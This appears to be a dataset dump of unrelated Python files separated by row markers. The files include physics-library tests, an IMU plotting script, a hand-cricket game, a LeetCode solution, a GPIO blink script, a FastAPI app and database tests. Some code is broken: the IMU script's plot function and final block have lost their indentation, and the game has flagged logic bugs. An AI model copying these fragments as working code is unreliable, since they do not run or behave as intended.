    Reference matrices are taken from Spacecraft Dynamics, by Kane, Likins,
    Levinson, 1982, Appendix I, pg. 422 ("Direction cosine matrices as
    functions of orientation angles").
    """
    c1 = cos(q1)
    c2 = cos(q2)
    c3 = cos(q3)
    s1 = sin(q1)
    s2 = sin(q2)
    s3 = sin(q3)
    #### Euler Angles (Body Fixed rotations) ####
    #### Body 1-2-3
    B = A.rotate('B', 'BODY123', (q1, q2, q3))
    R123_Body = Matrix([ [ c2*c3, -c2*s3, s2],
        [s1*s2*c3 + s3*c1, -s1*s2*s3 + c3*c1, -s1*c2],
        [-c1*s2*c3 + s3*s1, c1*s2*s3 + c3*s1, c1*c2]])
    W_B_A = Vector((q1p*c2*c3 + q2p*s3)*B[1] + (-q1p*c2*s3+q2p*c3)*B[2] +
        (q1p*s2 + q3p)*B[3])
    assert B.get_rot_matrices(A)[0] == R123_Body
    assert B.ang_vel(A) == W_B_A
    #### Body 1-3-2
    B = A.rotate('B', 'BODY132', (q1, q2, q3))
    R132_Body = Matrix([ [c2*c3, -s2, c2*s3],
        [c1*s2*c3 + s3*s1, c1*c2, c1*s2*s3 - c3*s1],
        [s1*s2*c3 - s3*c1, s1*c2, s1*s2*s3 + c3*c1]])
    W_B_A = Vector((q1p*c2*c3 - q2p*s3)*B[1] + (-q1p*s2+q3p)*B[2] + (q1p*c2*s3
        + q2p*c3)*B[3])
    assert B.get_rot_matrices(A)[0] == R132_Body
    assert B.ang_vel(A) == W_B_A
    #### Space Fixed rotations ####
    #### Space 1-2-3
    B = A.rotate('B', 'SPACE123', (q1, q2, q3))
    R123_Space = Matrix([ [c2*c3, s1*s2*c3 - s3*c1, c1*s2*c3 + s3*s1],
        [c2*s3, s1*s2*s3 + c3*c1, c1*s2*s3 - c3*s1],
        [-s2, s1*c2, c1*c2]])
    assert B.get_rot_matrices(A)[0] == R123_Space
    #### Space 1-3-2
    B = A.rotate('B', 'SPACE132', (q1, q2, q3))
    R132_Space = Matrix([ [c2*c3, -c1*s2*c3 + s3*s1, s1*s2*c3 + s3*c1],
        [s2, c1*c2, -s1*c2],
        [-c2*s3, c1*s2*s3 + c3*s1, -s1*s2*s3 + c3*c1]])
    # Leftover Python-2 debug prints of the two matrices were removed here;
    # the assertion below is the actual check.
    assert B.get_rot_matrices(A)[0] == R132_Space
def test_Point_get_point_list():
    """Shortest point paths through the located-point tree rooted at N.O."""
    l1, l2, l3 = symbols('l1 l2 l3')
    A = N.rotate('A', 1, q1)
    P1 = N.O.locate('P1', l1*N[1])
    P2 = N.O.locate('P2', l2*A[2])
    P3 = P2.locate('P3', l3*A[3])
    P4 = P3.locate('P4', 2*A[2] + 3*A[1])
    P5 = P3.locate('P5', 6*N[1] + 4*A[2])
    assert P1.get_point_list(N.O) == [P1, N.O]
    assert P1.get_point_list(P1) == [P1]
    assert P1.get_point_list(P2) == [P1, N.O, P2]
    assert P1.get_point_list(P3) == [P1, N.O, P2, P3]
    assert P1.get_point_list(P4) == [P1, N.O, P2, P3, P4]
    assert P1.get_point_list(P5) == [P1, N.O, P2, P3, P5]
    assert P2.get_point_list(N.O) == [P2, N.O]
    assert P2.get_point_list(P1) == [P2, N.O, P1]
    assert P2.get_point_list(P2) == [P2]
    assert P2.get_point_list(P3) == [P2, P3]
    assert P2.get_point_list(P4) == [P2, P3, P4]
    assert P2.get_point_list(P5) == [P2, P3, P5]
    assert P3.get_point_list(N.O) == [P3, P2, N.O]
    assert P3.get_point_list(P1) == [P3, P2, N.O, P1]
    assert P3.get_point_list(P2) == [P3, P2]
    assert P3.get_point_list(P3) == [P3]
    assert P3.get_point_list(P4) == [P3, P4]
    assert P3.get_point_list(P5) == [P3, P5]
    assert P4.get_point_list(N.O) == [P4, P3, P2, N.O]
    assert P4.get_point_list(P1) == [P4, P3, P2, N.O, P1]
    assert P4.get_point_list(P2) == [P4, P3, P2]
    assert P4.get_point_list(P3) == [P4, P3]
    assert P4.get_point_list(P4) == [P4]
    assert P4.get_point_list(P5) == [P4, P3, P5]
    assert P5.get_point_list(N.O) == [P5, P3, P2, N.O]
    assert P5.get_point_list(P1) == [P5, P3, P2, N.O, P1]
    assert P5.get_point_list(P2) == [P5, P3, P2]
    assert P5.get_point_list(P3) == [P5, P3]
    assert P5.get_point_list(P4) == [P5, P3, P4]
    assert P5.get_point_list(P5) == [P5]
def test_point_rel():
    """Point.rel returns the relative position vector, antisymmetric in its args."""
    l1, l2, l3 = symbols('l1 l2 l3')
    P1 = N.O.locate('P1', l1*N[1])
    P2 = P1.locate('P2', l2*A[1])
    assert N.O.rel(N.O) == zero
    assert N.O.rel(P1) == Vector(-l1*N[1])
    assert N.O.rel(P2) == Vector(-l1*N[1] - l2*A[1])
    assert P1.rel(N.O) == Vector(l1*N[1])
    assert P1.rel(P1) == zero
    assert P1.rel(P2) == Vector(-l2*A[1])
    assert P2.rel(N.O) == Vector(l1*N[1] + l2*A[1])
    assert P2.rel(P1) == Vector(l2*A[1])
    assert P2.rel(P2) == zero
def test_point_rel2():
    """Point.rel with mixed-frame offsets; CP cancels P2's offset back to P1."""
    l1, l2, l3, r1, r2 = symbols('l1 l2 l3 r1 r2')
    P1 = N.O.locate('P1', q1*N[1] + q2*N[2])
    P2 = P1.locate('P2', -r2*N[3] - r1*B[3])
    CP = P2.locate('CP', r2*N[3] + r1*B[3], C)
    assert N.O.rel(N.O) == zero
    assert N.O.rel(P1) == Vector(-q1*N[1] - q2*N[2]) == -P1.rel(N.O)
    assert N.O.rel(P2) == Vector(-q1*N[1] - q2*N[2] + r2*N[3] + r1*B[3]) == \
        -P2.rel(N.O)
    assert N.O.rel(CP) == Vector(-q1*N[1] - q2*N[2]) == -CP.rel(N.O)
    assert P1.rel(P1) == Vector(0)
    assert P1.rel(P2) == Vector(r1*B[3] + r2*N[3]) == -P2.rel(P1)
    assert P1.rel(CP) == Vector(0) == -CP.rel(P1)
    assert P2.rel(P2) == Vector(0)
    assert P2.rel(CP) == Vector(-r2*N[3] - r1*B[3]) == -CP.rel(P2)
    assert CP.rel(CP) == Vector(0)
def test_point_vel():
    """Inertial point velocities plus antisymmetry of relative velocities."""
    l1, l2, l3, r1, r2 = symbols('l1 l2 l3 r1 r2')
    P1 = N.O.locate('P1', q1*N[1] + q2*N[2])
    P2 = P1.locate('P2', -r2*A[3] - r1*B[3])
    CP = P2.locate('CP', r2*A[3] + r1*B[3], C)
    # These are checking that the inertial velocities of the 4 points are
    # correct
    assert N.O.vel() == Vector(0)
    assert P1.vel() == Vector(q1p*N[1] + q2p*N[2])
    assert P2.vel() == P1.vel() + Vector(-r1*q1p*sin(q2)*B[1] \
        + r1*q2p*B[2])
    # NOTE(review): a removed debug print computed this expectation with
    # -r2*q3p*A[2] instead of -r2*q2p*A[2] — confirm which coefficient is
    # intended before relying on this assertion.
    assert CP.vel() == P1.vel() + Vector(-r2*q2p*A[2] + \
        (r1*q3p + r2*q3p*cos(q2))*B[1])
    # These are just checking that v_p1_p2_N == -v_p2_p1_N
    assert N.O.vel(N.O, N) == Vector(0)
    assert N.O.vel(P1, N) == -P1.vel(N.O, N)
    assert N.O.vel(P2, N) == -P2.vel(N.O, N)
    assert N.O.vel(CP, N) == -CP.vel(N.O, N)
    assert N.O.vel(N.O, A) == Vector(0)
    assert N.O.vel(P1, A) == -P1.vel(N.O, A)
    assert N.O.vel(P2, A) == -P2.vel(N.O, A)
    assert N.O.vel(CP, A) == -CP.vel(N.O, A)
    assert N.O.vel(N.O, B) == Vector(0)
    assert N.O.vel(P1, B) == -P1.vel(N.O, B)
    assert N.O.vel(P2, B) == -P2.vel(N.O, B)
    assert N.O.vel(CP, B) == -CP.vel(N.O, B)
    assert N.O.vel(N.O, C) == Vector(0)
    assert N.O.vel(P1, C) == -P1.vel(N.O, C)
    assert N.O.vel(P2, C) == -P2.vel(N.O, C)
    assert N.O.vel(CP, C) == -CP.vel(N.O, C)
    assert P1.vel(N.O, N) == -N.O.vel(P1, N)
    assert P1.vel(P1, N) == Vector(0)
    assert P1.vel(P2, N) == -P2.vel(P1, N)
    assert P1.vel(CP, N) == -CP.vel(P1, N)
    assert P1.vel(N.O, A) == -N.O.vel(P1, A)
    assert P1.vel(P1, A) == Vector(0)
    assert P1.vel(P2, A) == -P2.vel(P1, A)
    assert P1.vel(CP, A) == -CP.vel(P1, A)
    assert P1.vel(N.O, B) == -N.O.vel(P1, B)
    assert P1.vel(P1, B) == Vector(0)
    assert P1.vel(P2, B) == -P2.vel(P1, B)
    assert P1.vel(CP, B) == -CP.vel(P1, B)
    assert P1.vel(N.O, C) == -N.O.vel(P1, C)
    assert P1.vel(P1, C) == Vector(0)
    assert P1.vel(P2, C) == -P2.vel(P1, C)
    assert P1.vel(CP, C) == -CP.vel(P1, C)
    assert P2.vel(N.O, N) == -N.O.vel(P2, N)
    assert P2.vel(P1, N) == -P1.vel(P2, N)
    assert P2.vel(P2, N) == Vector(0)
    assert P2.vel(CP, N) == -CP.vel(P2, N)
    assert P2.vel(N.O, A) == -N.O.vel(P2, A)
    assert P2.vel(P1, A) == -P1.vel(P2, A)
    assert P2.vel(P2, A) == Vector(0)
    assert P2.vel(CP, A) == -CP.vel(P2, A)
    assert P2.vel(N.O, B) == -N.O.vel(P2, B)
    assert P2.vel(P1, B) == -P1.vel(P2, B)
    assert P2.vel(P2, B) == Vector(0)
    assert P2.vel(CP, B) == -CP.vel(P2, B)
    assert P2.vel(N.O, C) == -N.O.vel(P2, C)
    assert P2.vel(P1, C) == -P1.vel(P2, C)
    assert P2.vel(P2, C) == Vector(0)
    assert P2.vel(CP, C) == -CP.vel(P2, C)
    assert CP.vel(N.O, N) == -N.O.vel(CP, N)
    assert CP.vel(P1, N) == -P1.vel(CP, N)
    assert CP.vel(P2, N) == -P2.vel(CP, N)
    assert CP.vel(CP, N) == Vector(0)
    assert CP.vel(N.O, A) == -N.O.vel(CP, A)
    assert CP.vel(P1, A) == -P1.vel(CP, A)
    assert CP.vel(P2, A) == -P2.vel(CP, A)
    assert CP.vel(CP, A) == Vector(0)
    assert CP.vel(N.O, B) == -N.O.vel(CP, B)
    assert CP.vel(P1, B) == -P1.vel(CP, B)
    assert CP.vel(P2, B) == -P2.vel(CP, B)
    assert CP.vel(CP, B) == Vector(0)
    assert CP.vel(N.O, C) == -N.O.vel(CP, C)
    assert CP.vel(P1, C) == -P1.vel(CP, C)
    # Sign fixed: every other pairing asserts antisymmetry (v_a_b == -v_b_a)
    # but this one compared without the minus sign.
    assert CP.vel(P2, C) == -P2.vel(CP, C)
    assert CP.vel(CP, C) == Vector(0)
def test_Dyad_express():
    """Dyad.express over all nine A[i]*A[j] basis dyads.

    NOTE(review): both groups of assertions are commented out as string
    literals, so this test currently only exercises Dyad construction.
    """
    A = N.rotate('A', 1, q1)
    I = Symbol('I')
    # Unit-coefficient dyads for every ordered basis pair.
    a1a1 = Dyad({A[1]*A[1]: 1})
    a1a2 = Dyad({A[1]*A[2]: 1})
    a1a3 = Dyad({A[1]*A[3]: 1})
    a2a1 = Dyad({A[2]*A[1]: 1})
    a2a2 = Dyad({A[2]*A[2]: 1})
    a2a3 = Dyad({A[2]*A[3]: 1})
    a3a1 = Dyad({A[3]*A[1]: 1})
    a3a2 = Dyad({A[3]*A[2]: 1})
    a3a3 = Dyad({A[3]*A[3]: 1})
    """
    assert a1a1.express(N) == Dyad({N[1]*N[1]: 1})
    assert a1a2.express(N) == Dyad({N[1]*N[2]: cos(q1), N[1]*N[3]: sin(q1)})
    assert a1a3.express(N) == Dyad(-sin(q1)*N[1]*N[2] + cos(q1)*N[1]*N[3])
    assert a2a1.express(N) == Dyad(cos(q1)*N[2]*N[1] + sin(q1)*N[3]*N[1])
    assert a2a2.express(N) == Dyad(cos(q1)**2*N[2]*N[2] + sin(q1)*cos(q1)*N[2]*N[3] + sin(q1)*cos(q1)*N[3]*N[2] + sin(q1)**2*N[3]*N[3])
    assert a2a3.express(N) == Dyad(-sin(q1)*cos(q1)*N[2]*N[2] + cos(q1)**2*N[2]*N[3] - sin(q1)**2*N[3]*N[2] + sin(q1)*cos(q1)*N[3]*N[3])
    assert a3a1.express(N) == Dyad(-sin(q1)*N[2]*N[1] + cos(q1)*N[3]*N[1])
    assert a3a2.express(N) == Dyad(-sin(q1)*cos(q1)*N[2]*N[2] - sin(q1)**2*N[2]*N[3] + cos(q1)**2*N[3]*N[2] + sin(q1)*cos(q1)*N[3]*N[3])
    assert a3a3.express(N) == Dyad(sin(q1)**2*N[2]*N[2] - sin(q1)*cos(q1)*N[2]*N[3] - sin(q1)*cos(q1)*N[3]*N[2] + cos(q1)**2*N[3]*N[3])
    """
    # Same dyads with a symbolic coefficient I.
    a1a1 = Dyad({A[1]*A[1]: I})
    a1a2 = Dyad({A[1]*A[2]: I})
    a1a3 = Dyad({A[1]*A[3]: I})
    a2a1 = Dyad({A[2]*A[1]: I})
    a2a2 = Dyad({A[2]*A[2]: I})
    a2a3 = Dyad({A[2]*A[3]: I})
    a3a1 = Dyad({A[3]*A[1]: I})
    a3a2 = Dyad({A[3]*A[2]: I})
    a3a3 = Dyad({A[3]*A[3]: I})
    """
    assert a1a1.express(N) == Dyad(I*N[1]*N[1])
    assert a1a2.express(N) == Dyad(I*cos(q1)*N[1]*N[2] + I*sin(q1)*N[1]*N[3])
    assert a1a3.express(N) == Dyad(-I*sin(q1)*N[1]*N[2] + I*cos(q1)*N[1]*N[3])
    assert a2a1.express(N) == Dyad(I*cos(q1)*N[2]*N[1] + I*sin(q1)*N[3]*N[1])
    assert a2a2.express(N) == Dyad(I*cos(q1)**2*N[2]*N[2] +
    I*sin(q1)*cos(q1)*N[2]*N[3] + I*sin(q1)*cos(q1)*N[3]*N[2] + I*sin(q1)**2*N[3]*N[3])
    assert a2a3.express(N) == Dyad(-I*sin(q1)*cos(q1)*N[2]*N[2] +
    I*cos(q1)**2*N[2]*N[3] - I*sin(q1)**2*N[3]*N[2] + I*sin(q1)*cos(q1)*N[3]*N[3])
    assert a3a1.express(N) == Dyad(-I*sin(q1)*N[2]*N[1] + I*cos(q1)*N[3]*N[1])
    assert a3a2.express(N) == Dyad(-I*sin(q1)*cos(q1)*N[2]*N[2] -
    I*sin(q1)**2*N[2]*N[3] + I*cos(q1)**2*N[3]*N[2] + I*sin(q1)*cos(q1)*N[3]*N[3])
    assert a3a3.express(N) == Dyad(I*sin(q1)**2*N[2]*N[2] -
    I*sin(q1)*cos(q1)*N[2]*N[3] - I*sin(q1)*cos(q1)*N[3]*N[2] + I*cos(q1)**2*N[3]*N[3])
    """
|
# (Fixed: the first import line was corrupted with extraction junk
# "983,757 | c456a5... |" prefixed to it.)
import imufusion
import matplotlib.pyplot as pyplot
import numpy
import sys

# Import sensor data. Expected CSV columns: timestamp, gyroscope xyz,
# accelerometer xyz, magnetometer xyz — TODO confirm against the file.
data = numpy.genfromtxt("sensor_data.csv", delimiter=",", skip_header=1)

sample_rate = 100  # 100 Hz

timestamp = data[:, 0]
gyroscope = data[:, 1:4]
accelerometer = data[:, 4:7]
magnetometer = data[:, 7:10]
# Instantiate algorithms
offset = imufusion.Offset(sample_rate)
ahrs = imufusion.Ahrs()
ahrs.settings = imufusion.Settings(imufusion.CONVENTION_NWU,  # convention
                                   0.5,  # gain
                                   10,  # acceleration rejection
                                   20,  # magnetic rejection
                                   5 * sample_rate)  # recovery trigger period = 5 seconds

# Process sensor data sample by sample, collecting Euler angles plus the
# algorithm's internal states and flags for plotting below.
delta_time = numpy.diff(timestamp, prepend=timestamp[0])

euler = numpy.empty((len(timestamp), 3))
internal_states = numpy.empty((len(timestamp), 6))
flags = numpy.empty((len(timestamp), 3))

for index in range(len(timestamp)):
    # Apply gyroscope offset correction before the AHRS update.
    gyroscope[index] = offset.update(gyroscope[index])

    ahrs.update(gyroscope[index], accelerometer[index], magnetometer[index], delta_time[index])

    euler[index] = ahrs.quaternion.to_euler()

    ahrs_internal_states = ahrs.internal_states
    internal_states[index] = numpy.array([ahrs_internal_states.acceleration_error,
                                          ahrs_internal_states.accelerometer_ignored,
                                          ahrs_internal_states.acceleration_recovery_trigger,
                                          ahrs_internal_states.magnetic_error,
                                          ahrs_internal_states.magnetometer_ignored,
                                          ahrs_internal_states.magnetic_recovery_trigger])

    ahrs_flags = ahrs.flags
    flags[index] = numpy.array([ahrs_flags.initialising,
                                ahrs_flags.acceleration_recovery,
                                ahrs_flags.magnetic_recovery])
def plot_bool(axis, x, y, label):
axis.plot(x, y, "tab:cyan", label=label)
pyplot.sca(axis)
pyplot.yticks([0, 1], ["False", "True"])
axis.grid()
axis.legend()
# Plot Euler angles
figure, axes = pyplot.subplots(nrows=10, sharex=True, gridspec_kw={"height_ratios": [6, 1, 2, 1, 1, 1, 2, 1, 1, 1]})
figure.suptitle("Euler angles, internal states, and flags")
axes[0].plot(timestamp, euler[:, 0], "tab:red", label="Roll")
axes[0].plot(timestamp, euler[:, 1], "tab:green", label="Pitch")
axes[0].plot(timestamp, euler[:, 2], "tab:blue", label="Yaw")
axes[0].set_ylabel("Degrees")
axes[0].grid()
axes[0].legend()
# Plot initialising flag
plot_bool(axes[1], timestamp, flags[:, 0], "Initialising")
# Plot acceleration rejection internal states and flags
axes[2].plot(timestamp, internal_states[:, 0], "tab:olive", label="Acceleration error")
axes[2].set_ylabel("Degrees")
axes[2].grid()
axes[2].legend()
plot_bool(axes[3], timestamp, internal_states[:, 1], "Accelerometer ignored")
axes[4].plot(timestamp, internal_states[:, 2], "tab:orange", label="Acceleration recovery trigger")
axes[4].grid()
axes[4].legend()
plot_bool(axes[5], timestamp, flags[:, 1], "Acceleration recovery")
# Plot magnetic rejection internal states and flags
axes[6].plot(timestamp, internal_states[:, 3], "tab:olive", label="Magnetic error")
axes[6].set_ylabel("Degrees")
axes[6].grid()
axes[6].legend()
plot_bool(axes[7], timestamp, internal_states[:, 4], "Magnetometer ignored")
axes[8].plot(timestamp, internal_states[:, 5], "tab:orange", label="Magnetic recovery trigger")
axes[8].grid()
axes[8].legend()
plot_bool(axes[9], timestamp, flags[:, 2], "Magnetic recovery")
if len(sys.argv) == 1: # don't show plots when script run by CI
pyplot.show()
|
983,758 | 107716a0fc32753ca310488261b2e3b148c30eec | print """
Let's play hand cricket.
For rules type rules().
"""
def rules():
    # Print the rules of hand cricket. NOTE(review): the string contains
    # typos ("no fom", "Tf not") that are user-facing runtime text and are
    # left untouched here.
    print """1. Player 1 bats first.
2. Player has to choose no fom 0 to 6
3. If both player choose the same number
than batsman is out.
4. Tf not then the number is added to the batsman total."""
# --- Setup (Python 2: print statements and raw_input throughout) ---
player1 = raw_input("Player 1's name > ")
player2 = raw_input("Player 2's name > ")
overs = int(raw_input('How much overs would you like to play? > '))
raw_input("Are you ready?")
# --- First innings: player1 bats, player2 bowls ---
score = 0
i = 1  # ball counter, 1..overs*6
while i <= overs*6:
    # Integer division: i/6 is the completed overs, i-1 the balls shown.
    print "Over: ",i/6,'.',i-1
    bat = int(raw_input(player1 + " > "))
    ball = int(raw_input(player2 +" > "))
    if 0 > bat or bat > 6:
        # Out-of-range choice: no runs, ball still counts.
        print '%r commited a foul.' % player1
        print "Type rules() for help."
        print "%r's total score is %r" %(player1, score)
        i = i + 1
    elif bat == ball:
        # Matching numbers: batsman out, innings ends immediately.
        print "%r is out."%(player1)
        print "%r's total score is %r."%(player1, score)
        i = overs*6 +1
    else:
        score = score + bat
        print "%r scored %r runs." %(player1, bat)
        print "%r's total score is %r" %(player1, score)
        i = i + 1
print "%r now has to defend %r "%(player1, score)
target = score + 1
print "%r has to score %r runs to win."%(player2, target)
# --- Second innings: player2 chases the target ---
score = 0
i = 1
while i <= overs*6:
    print "Over: ",i/6,'.',i-1
    bat = int(raw_input(player2 + " > "))
    ball = int(raw_input(player1 +" > "))
    if (0 > bat or bat > 6) and score < target:
        print '%r commited a foul.' % player2
        print "Type rules() for help."
        print "%r's total score is %r" %(player2, score)
        i = i + 1
    elif bat == ball and score < target:
        print "%r is out."%(player2)
        print "%r's total score is %r."%(player2, score)
        i = overs*6 +1
    elif bat!= ball and score < target:
        score = score + bat
        print "%r scored %r runs." %(player2, bat)
        print "%r's total score is %r" %(player2, score)
        i = i + 1
    elif score > target:
        # NOTE(review): this branch never increments i, so once the score
        # exceeds the target the loop prints this line forever — confirm
        # whether a break/i update is missing.
        print "%r wins this game."%player2
    else:
        i = i + 1
# NOTE(review): final verdict only distinguishes a tie (score == target-1,
# i.e. equal to the first-innings score) from "player1 won"; a successful
# chase (score >= target) also prints that player1 won — looks inverted.
if score == target - 1:
    print "Match is Tied between %r and %r."%(player1, player2)
else:
    print "%r has won this match."%(player1)
raw_input("Press any key to exit")
|
983,759 | 2a27b8f65b3debfd9504da9323bd975b0796d2a6 | '''
tags: Doubly Linked List, DFS
430. Flatten a Multilevel Doubly Linked List
Medium
You are given a doubly linked list which in addition to the next and previous pointers, it could have a child pointer, which may or may not point to a separate doubly linked list. These child lists may have one or more children of their own, and so on, to produce a multilevel data structure, as shown in the example below.
Flatten the list so that all the nodes appear in a single-level, doubly linked list. You are given the head of the first level of the list.
Example:
Input:
1---2---3---4---5---6--NULL
|
7---8---9---10--NULL
|
11--12--NULL
Output:
1-2-3-7-8-11-12-9-10-4-5-6-NULL
'''
"""
# Definition for a Node.
class Node:
def __init__(self, val, prev, next, child):
self.val = val
self.prev = prev
self.next = next
self.child = child
"""
class Solution:
    def flatten(self, head: 'Node') -> 'Node':
        """Flatten a multilevel doubly linked list in depth-first order.

        Iterative DFS with an explicit stack: each child list is spliced in
        immediately after its parent node, and all ``child`` pointers are
        cleared. Runs in O(n) time and O(n) worst-case extra space.

        Fixes over the previous version: removed the leftover debug
        ``print(val)`` and its unused accumulator, and dropped the dummy
        ``Node(None, None, None, None)`` head (which required the external
        ``Node`` class just to allocate a throwaway object).
        """
        if not head:
            return None
        stack = [head]
        prev = None  # last node already stitched into the flat list
        while stack:
            node = stack.pop()
            # Push `next` first so `child` is popped (and visited) before it.
            if node.next:
                stack.append(node.next)
            if node.child:
                stack.append(node.child)
                node.child = None  # flattened list must carry no child links
            if prev is not None:
                prev.next = node
                node.prev = prev
            prev = node
        head.prev = None
        return head
983,760 | 0b8f9d6863f38741fcf74fc1ad6926a11b43baeb | /home/christoph/anaconda3/lib/python3.6/sre_constants.py |
983,761 | f09dda38e8565f21d64e99811842c8a26af90d73 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setup(2, GPIO.OUT)
try:
    # Blink the LED on BCM pin 2 five times (2 s on, 2 s off).
    # `range` replaces the Python-2-only `xrange`, making the script run on
    # Python 3 as well.
    for _ in range(5):
        GPIO.output(2, True)
        time.sleep(2)
        GPIO.output(2, False)
        time.sleep(2)
finally:
    # Always release the GPIO pins, even if the blink loop is interrupted
    # (Ctrl-C previously skipped cleanup entirely).
    GPIO.cleanup()
|
983,762 | 66fe097e10224742621d19f5fbd553f855272966 |
from xai.brain.wordbase.verbs._exile import _EXILE
# class header
class _EXILING(_EXILE):
    """Dictionary entry for the verb form "exiling", derived from "exile"."""

    def __init__(self):
        # Initialise the base entry first, then override the form metadata
        # in the same order the base attributes are normally set.
        _EXILE.__init__(self)
        self.name = "EXILING"
        self.specie = 'verbs'
        self.basic = "exile"
        self.jsondata = {}
|
983,763 | 1302e26d157103c9389343fa057f7ad9bf4d4faa | import divide_in_pos_neg
from collections import Counter
def read_words(words_file):
    """Return every whitespace-separated token of *words_file*, in file order.

    Fix: the previous version opened the file without ever closing it; the
    ``with`` block now releases the handle deterministically.
    """
    with open(words_file, 'r') as handle:
        return [word for line in handle for word in line.split()]
def divide_in_pos_neg_vocab_file(txt):
    """Split *txt* into positive/negative word files and write vocabularies.

    Delegates the sentiment split to ``divide_in_pos_neg`` (which produces
    ``positive.txt`` / ``negative.txt`` in the working directory), then writes
    ``pos_vocabulary.txt`` and ``neg_vocabulary.txt``: one "word count" line
    per word occurring at least twice in its respective file.

    BUG FIX: the negative vocabulary previously counted occurrences in the
    *positive* word list (``words.count(word)``) instead of the negative one.
    """
    divide_in_pos_neg.divide_in_pos_neg_textfile(txt)
    _write_vocab(read_words("positive.txt"), '+', "pos_vocabulary.txt")
    _write_vocab(read_words("negative.txt"), '-', "neg_vocabulary.txt")
    return


def _write_vocab(words, marker, out_path):
    """Write "word count" lines for words in *words* occurring >= 2 times.

    First-occurrence order is preserved and the sentiment marker token
    (*marker*, '+' or '-') is excluded. Counting uses a single Counter pass
    instead of the previous O(n^2) ``list.count`` per word, and the output
    file is closed deterministically via ``with``.
    """
    counts = Counter(words)
    written = set()
    with open(out_path, "w") as handle:
        for word in words:
            if counts[word] >= 2 and word != marker and word not in written:
                written.add(word)
                handle.write(word + ' ' + str(counts[word]) + '\n')
|
983,764 | 69a593acbb1f9816fe0757f7aef041843181ccf5 | import uvicorn
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from fastapi.responses import HTMLResponse, RedirectResponse
# from .dependencies import oauth2_scheme
from api.routers import jobs, nvd, preprocessed, users, endpoints, home
from log.logger import logger
from util.config_parser import parse_config_file
from fastapi.staticfiles import StaticFiles
# OpenAPI tag metadata rendered in the generated /docs UI.
api_metadata = [
    {"name": "data", "description": "Operations with data used to train ML models."},
    {
        "name": "jobs",
        "description": "Manage jobs.",
        "externalDocs": {
            "description": "Items external docs",
            "url": "https://fastapi.tiangolo.com/",
        },
    },
]
app = FastAPI(openapi_tags=api_metadata)
# CORS: allow the local dev front end (port 3000) to call the API from the
# browser, with credentials and any method/header.
app.add_middleware(
    CORSMiddleware,
    allow_origins=["http://localhost:3000", "localhost:3000"],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)
# Feature routers; registration order only affects grouping in the docs.
app.include_router(users.router)
app.include_router(nvd.router)
app.include_router(preprocessed.router)
app.include_router(endpoints.router)
app.include_router(home.router)
# Static assets at /static; path is relative to the process working directory.
app.mount("/static", StaticFiles(directory="service/static"), name="static")
# -----------------------------------------------------------------------------
@app.get("/", response_class=HTMLResponse)
async def read_items():
    """Redirect the bare root URL to the interactive API docs."""
    return RedirectResponse(url="/docs")
# -----------------------------------------------------------------------------
@app.get("/status")
async def get_status():
    """Liveness probe endpoint: always reports the service as up."""
    payload = {"status": "ok"}
    return payload
if __name__ == "__main__":
    # Local/dev entry point: apply the configured log level, then serve on
    # all interfaces. In production the app is typically run by an external
    # ASGI server instead of this block.
    config = parse_config_file()
    logger.setLevel(config.log_level)
    uvicorn.run(
        app,
        host="0.0.0.0",
        port=8000,
    )
|
983,765 | 6c619a263c2378b33863ed304e96f603d1b5b6e0 | # Copyright 2019 Iguazio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""SQLDB specific tests, common tests should be in test_dbs.py"""
from contextlib import contextmanager
from collections import defaultdict
from datetime import datetime, timedelta
from unittest.mock import Mock
import pytest
from mlrun.db import sqldb
from conftest import new_run
@pytest.fixture
def db():
    """Fresh in-memory SQLite-backed MLRun DB for each test."""
    database = sqldb.SQLDB('sqlite:///:memory:?check_same_thread=false')
    database.connect()
    return database
@contextmanager
def patch(obj, **kw):
    """Temporarily set attributes on *obj*, restoring the originals on exit."""
    saved = {name: getattr(obj, name) for name in kw}
    for name, value in kw.items():
        setattr(obj, name, value)
    try:
        yield obj
    finally:
        for name, value in saved.items():
            setattr(obj, name, value)
def test_list_artifact_tags(db: sqldb.SQLDB):
    """Artifact tags are reported per project only."""
    for uid, tag, project in (('1', 't1', 'p1'), ('2', 't2', 'p1'), ('2', 't2', 'p2')):
        db.store_artifact('k1', {}, uid, tag=tag, project=project)
    assert set(db.list_artifact_tags('p1')) == {'t1', 't2'}, 'bad tags'
def test_list_artifact_date(db: sqldb.SQLDB):
    """since/until filter on the artifact 'updated' timestamp."""
    newest = datetime(2020, 2, 16)
    middle = newest - timedelta(days=7)
    oldest = middle - timedelta(days=7)
    project = 'p7'
    for key, stamp, uid in (('k1', newest, 'u1'),
                            ('k2', middle, 'u2'),
                            ('k3', oldest, 'u3')):
        db.store_artifact(key, {'updated': stamp}, uid, project=project)

    assert len(db.list_artifacts(project=project, since=oldest, tag='*')) == 3, 'since t3'
    assert len(db.list_artifacts(project=project, since=middle, tag='*')) == 2, 'since t2'
    assert not db.list_artifacts(
        project=project, since=newest + timedelta(days=1), tag='*'), 'since t1+'
    assert len(db.list_artifacts(project=project, until=middle, tag='*')) == 2, 'until t2'
    assert len(db.list_artifacts(
        project=project, since=middle, until=middle, tag='*')) == 1, 'since/until t2'
def test_list_projects(db: sqldb.SQLDB):
    """Runs stored under several projects all surface in list_projects."""
    for i in range(10):
        run = new_run('s1', {'l1': 'v1', 'l2': 'v2'}, x=1)
        db.store_run(run, 'u7', project='prj%d' % (i % 3), iter=i)
    assert {p.name for p in db.list_projects()} == {'prj0', 'prj1', 'prj2'}
def test_schedules(db: sqldb.SQLDB):
    """Every stored schedule comes back from list_schedules."""
    total = 7
    for i in range(total):
        db.store_schedule({'i': i})
    found = list(db.list_schedules())
    assert len(found) == total, 'wrong number of schedules'
    assert {s['i'] for s in found} == set(range(total)), 'bad scheds'
def test_run_iter0(db: sqldb.SQLDB):
    """Iteration 0 of a multi-iteration run stays retrievable (issue 140)."""
    uid, project = 'uid39', 'lemon'
    run = new_run('s1', {'l1': 'v1', 'l2': 'v2'}, x=1)
    for iteration in range(7):
        db.store_run(run, uid, project, iteration)
